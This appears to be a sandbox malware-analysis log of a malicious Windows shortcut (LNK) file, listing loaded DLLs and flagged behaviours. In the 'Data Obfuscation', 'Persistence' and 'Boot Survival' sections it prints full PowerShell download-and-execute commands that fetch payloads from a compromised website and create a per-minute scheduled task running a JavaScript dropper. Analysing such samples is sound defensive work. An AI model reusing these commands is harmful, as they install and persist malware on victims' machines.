      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: mX3IqRiuFo.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\schtasks.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: C:\Windows\System32\wscript.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34890D20 push eax; retf 5_2_00007FFD34890D4D

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Tries to download and execute files (via powershell)
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
